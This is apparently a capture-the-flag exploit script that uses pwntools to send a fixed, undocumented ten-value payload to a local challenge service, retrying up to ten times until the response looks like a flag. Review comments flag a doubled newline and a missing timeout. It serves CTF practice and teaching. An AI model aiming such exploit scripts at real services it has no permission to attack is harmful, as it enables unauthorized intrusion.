
exploit.py

from pwn import *
import argparse

# Command-line options: the address of the service this script talks to.
# Defaults point at a local instance (localhost:1337).
parser = argparse.ArgumentParser()
parser.add_argument('--host', default='localhost', help='Host to connect to')
parser.add_argument('--port', type=int, default=1337, help='Port to connect to')
args = parser.parse_args()

# The original author notes the result is randomized, so a single attempt
# may not return the flag. Make up to ten independent attempts, each on a
# fresh connection, and stop at the first response that looks like a flag.
for _attempt in range(10):
    conn = remote(args.host, args.port)

    # Challenge-specific input, reproduced verbatim: ten comma-separated
    # values whose meaning is not documented on this page.
    # NOTE(review): the literal already ends in "\n" and sendline() appends
    # its own newline, so the service receives an extra empty line.
    payload = """0x21,100,0x42,100,0x4C,100,0x6,100,0x59,100\n"""
    conn.sendline(payload.encode())

    # recvall() reads until the peer closes the connection; no timeout is
    # set here, so an unresponsive service blocks this attempt indefinitely.
    response = conn.recvall().decode()

    # Success heuristic: any '{' in the output is treated as a flag. This is
    # a loose check; it does not validate a flag format.
    if '{' not in response:
        print('Failed to get flag; trying again')
        conn.close()
        continue

    print(response)
    break
else:
    # for/else: reached only when all ten attempts finished without a break.
    print('Failed to get flag')